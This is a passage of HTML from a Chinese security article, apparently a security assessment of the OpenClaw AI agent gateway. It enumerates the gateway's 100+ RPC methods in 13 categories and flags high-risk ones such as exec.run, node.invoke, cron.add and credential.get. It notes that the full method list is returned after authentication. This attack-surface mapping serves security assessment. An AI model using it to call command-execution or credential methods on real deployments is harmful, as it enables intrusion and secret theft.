使用统一格式规范</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">独立子系统</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">会话管理与 Agent 调度是两个独立的子系统</span></p></div></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验 4</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内部 RPC 方法全景枚举</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验目的</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">获取完整的 RPC 方法清单和风险评估</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">前提条件</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已完成认证</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">假设：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenClaw 作为编排网关，暴露了大量 RPC 方法，其中可能存在高风险方法。</span></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">验证方法：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在授权状态下，通过分析网关的方法路由表和事件订阅列表。</span></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">响应结果：</span></strong></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5063291139240507" data-s="300,640" data-type="png" data-w="553" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011221" src="https://wechat2rss.xlab.app/img-proxy/?k=8e785da2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCkLPr5hEXo09kUVnp10PnuMUtX24VPmiaEl1RIYia0TmKQMF61kAefodhXgFEEVIbVjIY1FyG5Pmtjz9BtA5ic4aVibp8d1FTOFciac%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过对源码的分析，发现其主要分为13类：系统诊断、配置管理、模型工具、Agent 管理、会话管理、对话交互、命令执行、设备管理、节点控制、定时任务、凭证管理、系统更新、通道插件。</span></p></div></div></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">方法分类（13 类，100+ 方法）：</span></strong></p><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">类别</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">方法示例</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">系统诊断</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">health, status, doctor.*</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">配置管理</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">config.get, config.set, config.patch</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">模型工具</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">models.list, tools.*, tts.*</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Agent 管理</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">agents.list, agents.create, agents.delete</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">会话管理</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">sessions.list, sessions.delete, sessions.compact</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">对话交互</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">chat.history, chat.send, agent</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">命令执行</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">exec.approval.*</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">设备管理</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">device.pair.*, device.token.*</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">节点控制</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">node.invoke, node.pair.*, node.list</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定时任务</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">cron.add, cron.remove, cron.list</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">凭证管理</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">secrets.resolve, secrets.reload</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">系统更新</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">update.run, wizard.*</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通道插件</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">channels.*, send, browser.*</span></p></div></div></td></tr></tbody></table></p></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">高风险方法清单（14 个）：</span></strong></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5541516245487365" data-s="300,640" data-type="png" data-w="554" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011225" src="https://wechat2rss.xlab.app/img-proxy/?k=9962e3a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jClCCmVNs4qicDgwvmvrhyO6UD3nyYJYHHWMuswacuWRicwsuCofs4UygCH7TMxR6RPPMA7CTFsjDNFgZogFsorgeaEIWILAkxDmo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">分析结论：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">结论</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">依据</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">方法总数 100+</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">涵盖系统控制的全生命周期</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">存在严重风险方法</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">exec.run, node.invoke, cron.add, credential.get</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可动态扩展</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通道插件可动态注册方法</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">认证后完全暴露</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">服务端在认证响应中主动返回完整方法列表</span></p></div></div></td></tr></tbody></table></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div 